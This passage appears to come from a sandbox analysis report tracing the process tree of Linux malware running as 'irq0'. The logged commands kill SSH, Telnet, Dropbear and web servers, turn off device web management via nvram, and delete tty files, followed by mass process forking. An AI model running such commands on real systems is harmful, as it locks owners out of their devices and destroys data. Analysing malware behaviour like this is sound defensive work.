            • service New Fork (PID: 6929, Parent: 5613)
            • systemctl (PID: 6929, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 6961, Parent: 5613)
            • systemctl (PID: 6961, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 6975, Parent: 5613)
            • systemctl (PID: 6975, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7010, Parent: 5613)
            • systemctl (PID: 7010, Parent: 5613, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5613, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop httpd.service
        • irq0 New Fork (PID: 5615, Parent: 5545)
        • sh (PID: 5615, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5628, Parent: 5615)
          • killall (PID: 5628, Parent: 5615, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mini_httpd
        • irq0 New Fork (PID: 5640, Parent: 5545)
        • sh (PID: 5640, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5667, Parent: 5640)
          • killall (PID: 5667, Parent: 5640, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 minihttpd
        • irq0 New Fork (PID: 5671, Parent: 5545)
        • sh (PID: 5671, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5677, Parent: 5671)
            • sh New Fork (PID: 5680, Parent: 5677)
            • cat (PID: 5680, Parent: 5677, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/thttpd.pid
        • irq0 New Fork (PID: 5678, Parent: 5545)
        • sh (PID: 5678, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
        • irq0 New Fork (PID: 5719, Parent: 5545)
        • sh (PID: 5719, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
        • irq0 New Fork (PID: 5751, Parent: 5545)
        • sh (PID: 5751, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5756, Parent: 5751)
          • killall (PID: 5756, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 httpd
        • irq0 New Fork (PID: 5757, Parent: 5545)
        • sh (PID: 5757, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service telnetd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5763, Parent: 5757)
          • service (PID: 5763, Parent: 5757, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service telnetd stop
            • service New Fork (PID: 5781, Parent: 5763)
            • basename (PID: 5781, Parent: 5763, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5808, Parent: 5763)
            • basename (PID: 5808, Parent: 5763, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5854, Parent: 5763)
            • systemctl (PID: 5854, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6014, Parent: 5763)
              • service New Fork (PID: 6018, Parent: 6014)
              • systemctl (PID: 6018, Parent: 6014, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6019, Parent: 6014)
              • sed (PID: 6019, Parent: 6014, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6186, Parent: 5763)
            • systemctl (PID: 6186, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6379, Parent: 5763)
            • systemctl (PID: 6379, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6451, Parent: 5763)
            • systemctl (PID: 6451, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6479, Parent: 5763)
            • systemctl (PID: 6479, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6505, Parent: 5763)
            • systemctl (PID: 6505, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6545, Parent: 5763)
            • systemctl (PID: 6545, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6571, Parent: 5763)
            • systemctl (PID: 6571, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6603, Parent: 5763)
            • systemctl (PID: 6603, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6607, Parent: 5763)
            • systemctl (PID: 6607, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6657, Parent: 5763)
            • systemctl (PID: 6657, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6662, Parent: 5763)
            • systemctl (PID: 6662, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6748, Parent: 5763)
            • systemctl (PID: 6748, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6776, Parent: 5763)
            • systemctl (PID: 6776, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6811, Parent: 5763)
            • systemctl (PID: 6811, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6825, Parent: 5763)
            • systemctl (PID: 6825, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6849, Parent: 5763)
            • systemctl (PID: 6849, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6891, Parent: 5763)
            • systemctl (PID: 6891, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6908, Parent: 5763)
            • systemctl (PID: 6908, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6930, Parent: 5763)
            • systemctl (PID: 6930, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 6973, Parent: 5763)
            • systemctl (PID: 6973, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 6980, Parent: 5763)
            • systemctl (PID: 6980, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7011, Parent: 5763)
            • systemctl (PID: 7011, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7077, Parent: 5763)
            • systemctl (PID: 7077, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7123, Parent: 5763)
            • systemctl (PID: 7123, Parent: 5763, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5763, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop telnetd.service
        • irq0 New Fork (PID: 5766, Parent: 5545)
        • sh (PID: 5766, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service sshd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5795, Parent: 5766)
          • service (PID: 5795, Parent: 5766, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service sshd stop
            • service New Fork (PID: 5811, Parent: 5795)
            • basename (PID: 5811, Parent: 5795, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5856, Parent: 5795)
            • basename (PID: 5856, Parent: 5795, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5860, Parent: 5795)
            • systemctl (PID: 5860, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6013, Parent: 5795)
              • service New Fork (PID: 6016, Parent: 6013)
              • systemctl (PID: 6016, Parent: 6013, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6017, Parent: 6013)
              • sed (PID: 6017, Parent: 6013, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6375, Parent: 5795)
            • systemctl (PID: 6375, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6450, Parent: 5795)
            • systemctl (PID: 6450, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6477, Parent: 5795)
            • systemctl (PID: 6477, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6504, Parent: 5795)
            • systemctl (PID: 6504, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6511, Parent: 5795)
            • systemctl (PID: 6511, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6549, Parent: 5795)
            • systemctl (PID: 6549, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6577, Parent: 5795)
            • systemctl (PID: 6577, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6604, Parent: 5795)
            • systemctl (PID: 6604, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6612, Parent: 5795)
            • systemctl (PID: 6612, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6658, Parent: 5795)
            • systemctl (PID: 6658, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6661, Parent: 5795)
            • systemctl (PID: 6661, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6749, Parent: 5795)
            • systemctl (PID: 6749, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6775, Parent: 5795)
            • systemctl (PID: 6775, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6788, Parent: 5795)
            • systemctl (PID: 6788, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6820, Parent: 5795)
            • systemctl (PID: 6820, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6847, Parent: 5795)
            • systemctl (PID: 6847, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6851, Parent: 5795)
            • systemctl (PID: 6851, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6897, Parent: 5795)
            • systemctl (PID: 6897, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6928, Parent: 5795)
            • systemctl (PID: 6928, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 6955, Parent: 5795)
            • systemctl (PID: 6955, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 6974, Parent: 5795)
            • systemctl (PID: 6974, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7009, Parent: 5795)
            • systemctl (PID: 7009, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7057, Parent: 5795)
            • systemctl (PID: 7057, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7082, Parent: 5795)
            • systemctl (PID: 7082, Parent: 5795, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5795, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop sshd.service
        • irq0 New Fork (PID: 5798, Parent: 5545)
        • sh (PID: 5798, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5838, Parent: 5798)
          • killall (PID: 5838, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd
        • irq0 New Fork (PID: 5844, Parent: 5545)
        • sh (PID: 5844, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5857, Parent: 5844)
          • killall (PID: 5857, Parent: 5844, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 utelnetd
        • irq0 New Fork (PID: 5858, Parent: 5545)
        • sh (PID: 5858, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
          • sh New Fork (PID: 5865, Parent: 5858)
          • killall (PID: 5865, Parent: 5858, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 dropbear
        • irq0 New Fork (PID: 5872, Parent: 5545)
        • sh (PID: 5872, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 sshd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5921, Parent: 5872)
          • killall (PID: 5921, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd
        • irq0 New Fork (PID: 5923, Parent: 5545)
        • sh (PID: 5923, Parent: 5545, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5966, Parent: 5923)
          • killall (PID: 5966, Parent: 5923, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 lighttpd
        • irq0 New Fork (PID: 8391, Parent: 5545)
          • irq0 New Fork (PID: 8393, Parent: 8391)
          • sh (PID: 8393, Parent: 8391, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8395, Parent: 8393)
              • sh New Fork (PID: 8396, Parent: 8395)
              • cat (PID: 8396, Parent: 8395, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8405, Parent: 8395)
              • cat (PID: 8405, Parent: 8395, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8406, Parent: 8395)
              • killall (PID: 8406, Parent: 8395, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
            • rm (PID: 8395, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/tty0 /var/run/tty1 /var/run/tty2 /var/run/tty3 /var/run/tty4 /var/run/tty5 /var/run/tty6 /tmp/tt*
        • irq0 New Fork (PID: 8487, Parent: 5545)
          • irq0 New Fork (PID: 8489, Parent: 8487)
          • irq0 New Fork (PID: 8490, Parent: 8487)
          • irq0 New Fork (PID: 8491, Parent: 8487)
          • irq0 New Fork (PID: 8492, Parent: 8487)
          • irq0 New Fork (PID: 8493, Parent: 8487)
          • irq0 New Fork (PID: 8499, Parent: 8487)
          • irq0 New Fork (PID: 8500, Parent: 8487)
          • irq0 New Fork (PID: 8501, Parent: 8487)
          • irq0 New Fork (PID: 8505, Parent: 8487)
          • irq0 New Fork (PID: 8506, Parent: 8487)
          • irq0 New Fork (PID: 8507, Parent: 8487)
          • irq0 New Fork (PID: 8511, Parent: 8487)
          • irq0 New Fork (PID: 8512, Parent: 8487)
          • irq0 New Fork (PID: 8513, Parent: 8487)
          • irq0 New Fork (PID: 8514, Parent: 8487)
          • irq0 New Fork (PID: 8519, Parent: 8487)
          • irq0 New Fork (PID: 8520, Parent: 8487)
          • irq0 New Fork (PID: 8523, Parent: 8487)
          • irq0 New Fork (PID: 8524, Parent: 8487)
          • irq0 New Fork (PID: 8525, Parent: 8487)
          • irq0 New Fork (PID: 8529, Parent: 8487)
          • irq0 New Fork (PID: 8530, Parent: 8487)
          • irq0 New Fork (PID: 8531, Parent: 8487)
          • irq0 New Fork (PID: 8535, Parent: 8487)
          • irq0 New Fork (PID: 8536, Parent: 8487)
          • irq0 New Fork (PID: 8537, Parent: 8487)
          • irq0 New Fork (PID: 8541, Parent: 8487)
          • irq0 New Fork (PID: 8542, Parent: 8487)
          • irq0 New Fork (PID: 8543, Parent: 8487)
          • irq0 New Fork (PID: 8547, Parent: 8487)
          • irq0 New Fork (PID: 8548, Parent: 8487)
          • irq0 New Fork (PID: 8549, Parent: 8487)
          • irq0 New Fork (PID: 8553, Parent: 8487)
          • irq0 New Fork (PID: 8555, Parent: 8487)
          • irq0 New Fork (PID: 8556, Parent: 8487)
          • irq0 New Fork (PID: 8559, Parent: 8487)
          • irq0 New Fork (PID: 8560, Parent: 8487)
          • irq0 New Fork (PID: 8561, Parent: 8487)
          • irq0 New Fork (PID: 8562, Parent: 8487)
          • irq0 New Fork (PID: 8567, Parent: 8487)
          • irq0 New Fork (PID: 8568, Parent: 8487)
          • irq0 New Fork (PID: 8569, Parent: 8487)
          • irq0 New Fork (PID: 8573, Parent: 8487)
          • irq0 New Fork (PID: 8574, Parent: 8487)
          • irq0 New Fork (PID: 8575, Parent: 8487)
          • irq0 New Fork (PID: 8576, Parent: 8487)
          • irq0 New Fork (PID: 8581, Parent: 8487)
          • irq0 New Fork (PID: 8582, Parent: 8487)
          • irq0 New Fork (PID: 8585, Parent: 8487)
          • irq0 New Fork (PID: 8587, Parent: 8487)
          • irq0 New Fork (PID: 8588, Parent: 8487)
          • irq0 New Fork (PID: 8589, Parent: 8487)
          • irq0 New Fork (PID: 8590, Parent: 8487)
          • irq0 New Fork (PID: 8595, Parent: 8487)
          • irq0 New Fork (PID: 8596, Parent: 8487)
          • irq0 New Fork (PID: 8597, Parent: 8487)
          • irq0 New Fork (PID: 8601, Parent: 8487)
          • irq0 New Fork (PID: 8602, Parent: 8487)
          • irq0 New Fork (PID: 8605, Parent: 8487)
          • irq0 New Fork (PID: 8606, Parent: 8487)
          • irq0 New Fork (PID: 8607, Parent: 8487)
          • irq0 New Fork (PID: 8608, Parent: 8487)
          • irq0 New Fork (PID: 8613, Parent: 8487)
          • irq0 New Fork (PID: 8614, Parent: 8487)
          • irq0 New Fork (PID: 8615, Parent: 8487)
          • irq0 New Fork (PID: 8616, Parent: 8487)
          • irq0 New Fork (PID: 8621, Parent: 8487)
          • irq0 New Fork (PID: 8622, Parent: 8487)
          • irq0 New Fork (PID: 8625, Parent: 8487)
          • irq0 New Fork (PID: 8626, Parent: 8487)
          • irq0 New Fork (PID: 8627, Parent: 8487)
          • irq0 New Fork (PID: 8631, Parent: 8487)
          • irq0 New Fork (PID: 8632, Parent: 8487)
          • irq0 New Fork (PID: 8635, Parent: 8487)
          • irq0 New Fork (PID: 8636, Parent: 8487)
          • irq0 New Fork (PID: 8640, Parent: 8487)
          • irq0 New Fork (PID: 8641, Parent: 8487)
          • irq0 New Fork (PID: 8643, Parent: 8487)
          • irq0 New Fork (PID: 8646, Parent: 8487)
          • irq0 New Fork (PID: 8647, Parent: 8487)
          • irq0 New Fork (PID: 8648, Parent: 8487)
          • irq0 New Fork (PID: 8651, Parent: 8487)
          • irq0 New Fork (PID: 8654, Parent: 8487)
          • irq0 New Fork (PID: 8655, Parent: 8487)
          • irq0 New Fork (PID: 8658, Parent: 8487)
          • irq0 New Fork (PID: 8659, Parent: 8487)
          • irq0 New Fork (PID: 8660, Parent: 8487)
          • irq0 New Fork (PID: 8664, Parent: 8487)
          • irq0 New Fork (PID: 8665, Parent: 8487)
          • irq0 New Fork (PID: 8666, Parent: 8487)
          • irq0 New Fork (PID: 8670, Parent: 8487)
          • irq0 New Fork (PID: 8671, Parent: 8487)
          • irq0 New Fork (PID: 8672, Parent: 8487)
          • irq0 New Fork (PID: 8676, Parent: 8487)
          • irq0 New Fork (PID: 8677, Parent: 8487)
          • irq0 New Fork (PID: 8678, Parent: 8487)
          • irq0 New Fork (PID: 8679, Parent: 8487)
          • irq0 New Fork (PID: 8694, Parent: 8487)
          • irq0 New Fork (PID: 8697, Parent: 8487)
          • irq0 New Fork (PID: 8698, Parent: 8487)
          • irq0 New Fork (PID: 8702, Parent: 8487)
          • irq0 New Fork (PID: 8703, Parent: 8487)
          • irq0 New Fork (PID: 8704, Parent: 8487)
          • irq0 New Fork (PID: 8723, Parent: 8487)
          • irq0 New Fork (PID: 8724, Parent: 8487)
          • irq0 New Fork (PID: 8727, Parent: 8487)
          • irq0 New Fork (PID: 8728, Parent: 8487)
          • irq0 New Fork (PID: 8729, Parent: 8487)
          • irq0 New Fork (PID: 8733, Parent: 8487)
          • irq0 New Fork (PID: 8734, Parent: 8487)
          • irq0 New Fork (PID: 8735, Parent: 8487)
          • irq0 New Fork (PID: 8739, Parent: 8487)
          • irq0 New Fork (PID: 8740, Parent: 8487)
          • irq0 New Fork (PID: 8743, Parent: 8487)
          • irq0 New Fork (PID: 8744, Parent: 8487)
          • irq0 New Fork (PID: 8747, Parent: 8487)
          • irq0 New Fork (PID: 8749, Parent: 8487)
          • irq0 New Fork (PID: 8750, Parent: 8487)
          • irq0 New Fork (PID: 8753, Parent: 8487)
          • irq0 New Fork (PID: 8754, Parent: 8487)
          • irq0 New Fork (PID: 8755, Parent: 8487)
          • irq0 New Fork (PID: 8759, Parent: 8487)
          • irq0 New Fork (PID: 8760, Parent: 8487)
          • irq0 New Fork (PID: 8762, Parent: 8487)
          • irq0 New Fork (PID: 8763, Parent: 8487)
          • irq0 New Fork (PID: 8767, Parent: 8487)
          • irq0 New Fork (PID: 8768, Parent: 8487)
          • irq0 New Fork (PID: 8771, Parent: 8487)
          • irq0 New Fork (PID: 8773, Parent: 8487)
          • irq0 New Fork (PID: 8774, Parent: 8487)
          • irq0 New Fork (PID: 8775, Parent: 8487)
          • irq0 New Fork (PID: 8779, Parent: 8487)
          • irq0 New Fork (PID: 8780, Parent: 8487)
          • irq0 New Fork (PID: 8783, Parent: 8487)
          • irq0 New Fork (PID: 8784, Parent: 8487)
          • irq0 New Fork (PID: 8785, Parent: 8487)
          • irq0 New Fork (PID: 8790, Parent: 8487)
          • irq0 New Fork (PID: 8792, Parent: 8487)
          • irq0 New Fork (PID: 8795, Parent: 8487)
          • irq0 New Fork (PID: 8796, Parent: 8487)
          • irq0 New Fork (PID: 8797, Parent: 8487)
          • irq0 New Fork (PID: 8801, Parent: 8487)
          • irq0 New Fork (PID: 8802, Parent: 8487)
          • irq0 New Fork (PID: 8803, Parent: 8487)
          • irq0 New Fork (PID: 8807, Parent: 8487)
          • irq0 New Fork (PID: 8809, Parent: 8487)
          • irq0 New Fork (PID: 8810, Parent: 8487)
          • irq0 New Fork (PID: 8811, Parent: 8487)
          • irq0 New Fork (PID: 8815, Parent: 8487)
          • irq0 New Fork (PID: 8816, Parent: 8487)
          • irq0 New Fork (PID: 8817, Parent: 8487)
          • irq0 New Fork (PID: 8821, Parent: 8487)
          • irq0 New Fork (PID: 8822, Parent: 8487)
          • irq0 New Fork (PID: 8823, Parent: 8487)
          • irq0 New Fork (PID: 8827, Parent: 8487)
          • irq0 New Fork (PID: 8828, Parent: 8487)
          • irq0 New Fork (PID: 8829, Parent: 8487)
          • irq0 New Fork (PID: 8830, Parent: 8487)
          • irq0 New Fork (PID: 8835, Parent: 8487)
          • irq0 New Fork (PID: 8836, Parent: 8487)
          • irq0 New Fork (PID: 8837, Parent: 8487)
          • irq0 New Fork (PID: 8841, Parent: 8487)
          • irq0 New Fork (PID: 8842, Parent: 8487)
          • irq0 New Fork (PID: 8844, Parent: 8487)
          • irq0 New Fork (PID: 8846, Parent: 8487)
          • irq0 New Fork (PID: 8847, Parent: 8487)
          • irq0 New Fork (PID: 8851, Parent: 8487)
          • irq0 New Fork (PID: 8852, Parent: 8487)
          • irq0 New Fork (PID: 8853, Parent: 8487)
          • irq0 New Fork (PID: 8858, Parent: 8487)
          • irq0 New Fork (PID: 8860, Parent: 8487)
          • irq0 New Fork (PID: 8862, Parent: 8487)
          • irq0 New Fork (PID: 8863, Parent: 8487)
          • irq0 New Fork (PID: 8864, Parent: 8487)
          • irq0 New Fork (PID: 8868, Parent: 8487)
          • irq0 New Fork (PID: 8869, Parent: 8487)
          • irq0 New Fork (PID: 8870, Parent: 8487)
          • irq0 New Fork (PID: 8874, Parent: 8487)
          • irq0 New Fork (PID: 8875, Parent: 8487)
          • irq0 New Fork (PID: 8878, Parent: 8487)
          • irq0 New Fork (PID: 8880, Parent: 8487)
          • irq0 New Fork (PID: 8881, Parent: 8487)
          • irq0 New Fork (PID: 8886, Parent: 8487)
          • irq0 New Fork (PID: 8888, Parent: 8487)
          • irq0 New Fork (PID: 8890, Parent: 8487)
          • irq0 New Fork (PID: 8891, Parent: 8487)
          • irq0 New Fork (PID: 8892, Parent: 8487)
          • irq0 New Fork (PID: 8896, Parent: 8487)
          • irq0 New Fork (PID: 8898, Parent: 8487)
          • irq0 New Fork (PID: 8899, Parent: 8487)
          • irq0 New Fork (PID: 8900, Parent: 8487)
          • irq0 New Fork (PID: 8905, Parent: 8487)
          • irq0 New Fork (PID: 8906, Parent: 8487)
          • irq0 New Fork (PID: 8909, Parent: 8487)
          • irq0 New Fork (PID: 8910, Parent: 8487)
          • irq0 New Fork (PID: 8911, Parent: 8487)
          • irq0 New Fork (PID: 8915, Parent: 8487)
          • irq0 New Fork (PID: 8916, Parent: 8487)
          • irq0 New Fork (PID: 8917, Parent: 8487)
          • irq0 New Fork (PID: 8918, Parent: 8487)
          • irq0 New Fork (PID: 8923, Parent: 8487)
          • irq0 New Fork (PID: 8924, Parent: 8487)
          • irq0 New Fork (PID: 8927, Parent: 8487)
          • irq0 New Fork (PID: 8928, Parent: 8487)
          • irq0 New Fork (PID: 8929, Parent: 8487)
          • irq0 New Fork (PID: 8930, Parent: 8487)
          • irq0 New Fork (PID: 8935, Parent: 8487)
          • irq0 New Fork (PID: 8994, Parent: 8487)
          • irq0 New Fork (PID: 8996, Parent: 8487)
          • irq0 New Fork (PID: 8998, Parent: 8487)
